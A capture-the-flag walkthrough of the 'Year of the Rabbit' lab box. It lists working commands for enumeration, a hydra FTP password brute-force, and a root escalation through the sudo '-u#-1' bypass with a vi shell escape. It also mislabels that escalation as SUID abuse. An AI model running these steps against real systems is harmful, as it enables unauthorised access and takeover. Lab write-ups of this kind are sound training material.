Year of the Rabbit

Welcome to the "Year of the Rabbit" — a lighthearted CTF-style box that offers a balanced mix of enumeration, basic exploitation, steganography, and privilege escalation to warm up your hacking skills for the new year. In this walkthrough, we’ll use tools like Nmap, Gobuster, Burpsuite, Hydra, and Steghide to uncover hidden paths, credentials, and ultimately obtain both the user and root flags. Along the way, we’ll practice privilege escalation techniques and learn how seemingly small clues can lead to full system compromise. Let's dive in without falling down the rabbit hole. 🐇

Flags

Let's have a nice gentle start to the New Year!
Can you hack into the Year of the Rabbit box without falling down a hole?

(Please ensure your volume is turned up!)

Answer the questions below

To start off we’ll enumarate and find some hints that might help us find some users, their passwords and probably leads to flags like files or paths.

nmap -sV IP_Address

gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

checking under assets on the browser their are two files a css and mp4 file. On clicking the css file there’s an hint of a php file. Trying to switching into the php file it gives an alert to turn off Javascript and it also behaves like a folder path instead of a file

• /sup3r_s3cr3t_fl4g.php && directory: sup3r_s3cret_fl4g

• Rick Astley - Never Gonna Give You Up: the MP4 video under assets (not much helpful)

trying to check further using gobuster there’s no much helpful hints

We’ll try using Burpsuite to intercept, as usual open Burpsuite and under proxy settings allow the browser option. Turn on the intercept and open the browser http://10.10.231.51:80 then add the path to our php file /sup3r_s3cr3t_fl4g.php then give it some time and check the responses under the raw section. A hidden path will be revealed.

Going back to our browser and switching to this path, we find an image which we’ll download it.

wget -q http://10.10.84.15/WExYY2Cv-qU/Hot_Babe.png

tried using steghide extract -sf Hot_Babe.png but was not successful opted to use strings

strings Hot_Babe.png

this reveals a user called ftpuser and a list of possible passwords which we’ll paste into a file inorder to use as our wordlist to find the user’s password using hydra.

hydra -l ftpuser -P userpas.txt ftp://10.10.84.15

when we login into ftp IP_Address using the username and password. We get a file that reveals new user and their password.

we’ll login using ssh

trying to find the user.txt file for the user flag and we’re shown the path where it’s found but we don’t have permission to read it.

Remember the ssh revealed something: s3cr3t

1 new message
Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE

1. What is the user flag?

find / -iname 's3cr3t' 2>/dev/null

ls -la

cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!

su - gwendoline

cat user.txt

2. What is the root flag?

   sudo -l

   sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

   type:

   :!/bin/sh

   

find / -type f -name root.txt 2>/dev/null

cat /root/root.txt

The “Year of the Rabbit” box was a great exercise in applying foundational skills in web enumeration, FTP/SSH access, steganography, and privilege escalation. Starting with simple recon using Nmap and Gobuster, we uncovered hidden paths and files. The combination of Burpsuite interception and strings analysis on an image led us to valid credentials, which then opened the door to further lateral movement. A hidden message hinted at a concealed file, and with user switching and SUID abuse via vi, we escalated privileges and captured the root flag. This challenge was a great reminder of how attention to detail and layered enumeration can lead to full system pwnage. 🎯🐰